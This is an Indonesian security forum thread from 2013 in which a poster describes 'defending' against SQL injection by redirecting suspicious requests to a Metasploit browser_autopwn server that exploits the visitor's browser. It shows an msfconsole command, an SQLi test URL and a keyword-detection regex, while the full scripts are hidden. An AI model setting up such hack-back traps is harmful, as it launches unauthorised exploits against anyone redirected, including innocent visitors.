Share menangkal serangan sqli dengan metasploit - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Defensive Zone (https://www.indonesianbacktrack.or.id/forum/forum-173.html) +--- Forum: Solutions & Patching (https://www.indonesianbacktrack.or.id/forum/forum-186.html) +--- Thread: Share menangkal serangan sqli dengan metasploit (/thread-4460.html) |
menangkal serangan sqli dengan metasploit - xnod_die - 04-24-2013 Hallo semua... kali ini saya ingin sharing , cara menangkal serangan sqli pada sebuah web,, menggunakan metasploit,,,, Kebanyakan para attacker itu menggunakan windows,,,, nah ini merupakan kesempatan bagi kita untuk melakukan serangan balik... :d langsung aja nh ,,, maaf klo repost.... [hide] buat script index.php Code: <?php sipp sekrang buat script biar lebih mudah gunain metasploit kasih nama antisqli.rc Code: # cat <<EOF> antisqli.rc Nah sekarang kita jalanin metasploit sambil nunggu si attacker menyerang,,, sambil ngopi2 + makan gorengan.. ./msfconsole -q -r antisqli.rc silahkan tunggu smpe ada log seperti ini Code: 192.168.1.5:1205 [302]: /?xnod=6%27 Code: msf auxiliary(browser_autopwn) > [/hide] regards xnod_die RE: menangkal serangan sqli dengan metasploit - zee eichel - 04-24-2013 wuihh keren bro tehniknya .... ijin belajar ya RE: menangkal serangan sqli dengan metasploit - m4k4ss4rh4ck3r - 04-24-2013 \m/\m/\m/\m/ngintips.dan nyimaks RE: menangkal serangan sqli dengan metasploit - [H2] - 04-24-2013 hahaha. serangan balik ya om, nice share deh . +1 dari saya RE: menangkal serangan sqli dengan metasploit - xombix - 04-24-2013 nice share om. keren nih,bisa di buat sebagai jebakan juga RE: menangkal serangan sqli dengan metasploit - Unregistered - 04-24-2013 wih mantep om.. bisa dijelasin ini maksudnya apa ? by|select|\'|hex|substr|\s)/i', $_GET['xnod'])) wih mantep om.. bisa dijelasin ini maksudnya apa ? by|select|\'|hex|substr|\s)/i', $_GET['xnod'])) RE: menangkal serangan sqli dengan metasploit - 5forA - 04-24-2013 wwiih,,... mantap ..... super ini omz,.... RE: menangkal serangan sqli dengan metasploit - alkaaf - 04-24-2013 wkwkwk semacam honeypot juga yah buat sqli injector. nice share bro. RE: menangkal serangan sqli dengan metasploit - xnod_die - 04-25-2013 (04-24-2013, 07:04 PM)Unregistered Wrote: wih mantep om.. iya pake fungsi preg_match() di php... misalkan link kita http://localhost/index.php?xnod=6 trus attacker mau nyerang pake tehnik sqli http://localhost/index.php?xnod=6+union+select+1,2,3-- nah fungsi preg_match() itu langsung mengalihkan ke IP jebakan,,, RE: menangkal serangan sqli dengan metasploit - xsan-lahci - 04-25-2013 nice trick dude buat di terapkan ke server training FWB keren nih wakakak |